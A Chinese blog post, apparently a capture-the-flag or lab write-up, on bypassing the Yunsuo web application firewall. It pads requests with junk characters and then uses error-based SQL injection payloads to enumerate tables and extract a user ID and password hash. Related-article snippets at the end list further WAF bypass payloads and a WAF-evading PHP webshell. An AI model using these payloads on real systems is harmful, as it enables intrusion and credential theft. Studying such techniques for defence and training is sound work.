SQL报错盲注绕过云锁

最新推荐文章于 2023-11-04 22:23:31 发布
最新推荐文章于 2023-11-04 22:23:31 发布
阅读量422 收藏 2
点赞数
分类专栏: sql注入 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52149675/article/details/124676952
版权

SQL报错盲注绕过云锁

在这里插入图片描述

有锁

在这里插入图片描述

还是被拦截了,怎么办?
我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对于一台服务器来说资源是很宝贵的,而这些所谓的杀毒软件和防护软件,他们检测的数据越多,消耗的资源也就越大导致网站越来越卡,影响正常用户体验,所以说出于用户体验感的目的,这个服务器的防护软件检测数据的长度或内容是有限的,那只有我们把间谍或特务放后面,他就检测不到了,绕过检测了,所以我们可以给他大量的垃圾字符串,当他检测到一定值时就不检测了,所以就绕过了。
那垃圾字符串放多长呢?
我们不知道,只能一个一个试,一边加一边go

在这里插入图片描述

大概长度:7400

在这里插入图片描述

查询表名:

(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)

因为这个是cms,只需知道表名格式即可,无需查找字段名

[
在这里插入图片描述

依次爆出其他表名

在这里插入图片描述

查询到表名格式:#__assets,…
接下来爆破查询表名
为方便查看

在这里插入图片描述

在这里插入图片描述

从结果中搜寻

在这里插入图片描述

找到我们想要的

在这里插入图片描述

再查询字段名,里面有#

(0x23,concat(0x7e,(select column_name from information_schema.columns where table_name='#__user_flag' limit 0,1)),1)

用这个查字段名

(1,concat(0x7e,(select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 64,1) limit 0,1)),1)

在这里插入图片描述

在这里插入图片描述

id passwd

具体内容

(1,concat(0x7e,(select id from #__user_flag limit 0,1)),1)
(1,concat(0x7e,(select passwd from #__user_flag limit 0,1)),1)

在这里插入图片描述

id: WhatsUp
passwd: 68e109f0f40ca72a15e05cc22786f8
md5解密: HelloWorld

crabin_lpb
关注
专栏目录
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 828
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
实验吧Web-易-简单的sql注入之3(报错sql盲注之exp)
Sea_Sand息禅
12-18 388
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
10 种方法绕过云锁以及tamber
03-16
T00LS 虽说是 10 种方法,但是其中思路是一样的,对云锁的规则进行了测 试后,最终发现了云锁一个致命的弱点,就是如果如果其中包含了注释符 号,那么其后面的内容便不进行 ... - Discuz! Boar...... 虽说是 10 种方法,但是其中思路是一样的,对云锁的规则进行了测试后,最终发现了云锁一个 致命的弱点,就是如果如果其中包含了注释符号,那么其后面的内容便不进行过滤,既然发现了 这个规则那么,我们就可以针对此规则构造正确的语句即可。
尤里的复仇II 回归
sparename的博客
09-05 1578
尤里的复仇II 回归归来-脚踏实地二级目录三级目录 归来-脚踏实地 进入页面,首先验证一下是不是cms模板 指纹验证:链接 在线cms指纹识别 当然也可以使用插件Wappalyzer来识别 得出此站为JoomlaCMS,去网上查下Joomla漏洞,发现他有很多版本,但不知道是什么版本,那怎么查版本呢,注意cms有文件,文件里面写明了版本号,所以我们只要找到写明cms版本的文件就可以了,但这个文件在哪,文件名我们并不知道,我们怎么找呢,很简单,因为cms模板里面内容可能会改,用cms建站文件名一般不会
尤里的复仇II 回归【7题】
feiniaotjx的博客
10-23 2933
尤里的复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
sqlmap之绕过云锁waf
qq_50854662的博客
01-05 2887
sqlmap之绕过云锁waf
【WAF剖析】——sql注入之云锁bypass
Demo不是emo的博客
11-26 7918
前天我们实战了安全狗的WAF,今天先来看看比它难度更高的云锁WAF,你会绕吗?看我带你将它拿下
SQL注入之基于布尔的盲注详解
09-10
在基于布尔的盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
确认并利用 SQL 盲注漏洞
最新发布
2301_77324496的博客
11-04 161
在服务器端,sql 注入和 sql 盲注是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第一个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 注入表单(SQL Injection)一模一样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后一个%匹配的是空字符,所以用户名是 dvwa@
SQL注入——盲注和手工注入】
bosskim的博客
06-13 1265
温故知新,学习sql注入分类
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全狗环境)更新了bypass安全SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁安全狗的sqlmap自动化绕过脚本 包含:绕过安全sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全狗:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
国外WAF绕过姿势.pdf
05-09
Web应用程序防火墙(WAF);应用程序 独立于开发人员保护的设计和web应用程序 是为攻击提供特殊保护的系统。此外,应用程序开发人员 他们自己的功能也有问题
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
2019最新过狗过,云锁,360等WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件
报错注入 与 绕过sql注入检测机制的一点思路
坚持硬核
01-28 569
相关的sql函数说明: rand() 用于产生一个0到1之间的随机数 floor() 向下取整 floor(rand()) 得到的值永远为0 floor(rand()*2) 得到的值可能为1可能为0 select floor(rand()*2) from 有很多数据的表名 有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现 但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110 select co
云锁 mysql权限控制_利用apache特性绕过云锁sql注入防护
weixin_39899776的博客
02-05 221
测试代码:$db_host = 'localhost';$db_user = 'root';$db_pass = 'root';$id = $_REQUEST['sql'];$link = mysql_connect($db_host, $db_user, $db_pass) or die("DB Connect Error:" . mysql_error());mysql_select_db('...
WAF - SQL注入之绕过云锁 靶场实战
weixin_54771278的博客
05-29 2643
实验介绍 云锁是基于操作系统内核加固技术的免费服务器安全管理软件,由国内信息安全厂商椒图科技自主研发,凝结操作系统内核加固领域数十年的经验积累,集合服务器安全、网站安全管理为一体,以操作系统内核加固技术为基础,同时开放网站安全防护、登录防护、流量防护、资源监控、系统优化、安全日志6大功能模块,有效抵御CC、SQL注入、XSS病毒、木马、webshell等黑客攻击,为广大服务器管理员打造高效、可靠、便捷的服务器安全管理方案。 传统的安全防御手段大多基于网络层或者应用层,如防火墙、IDS、杀毒软件等等,..
sql注入绕过宝塔+安全狗+云锁
m0_55563900的博客
04-05 2163
1,判断闭合方式:id=1") --+ 2,判断列数:id=1") order%23%0aby 3–+ 3,获得当前数据库下所有表名 -1") union%23%0aall select 1,database(%23%0a),group_concat(table_name) from %23%0ainformation_schema.tables%23%0awhere%23%0atable_schema=database(%23%0a)–+ 4,获得指定表的所有列名 -1") union%23%0aall
[11期]绕过安全狗、云锁等各大WAF注入,上传深入自动化Bypass攻击
05-03 377
CDN 负载均衡、内容分发 解析漏洞一般在服务层 二进制,溢出,提权在系统层 渗透测试就是以上全部层 协议未正确解析 GET改POST 这叫参数污染 cookie 改一个较大的值 有的waf承受不了这么大的值,参数污染 HTTP参数污染 HPP参数污染 使用多个无...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

crabin_lpb

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值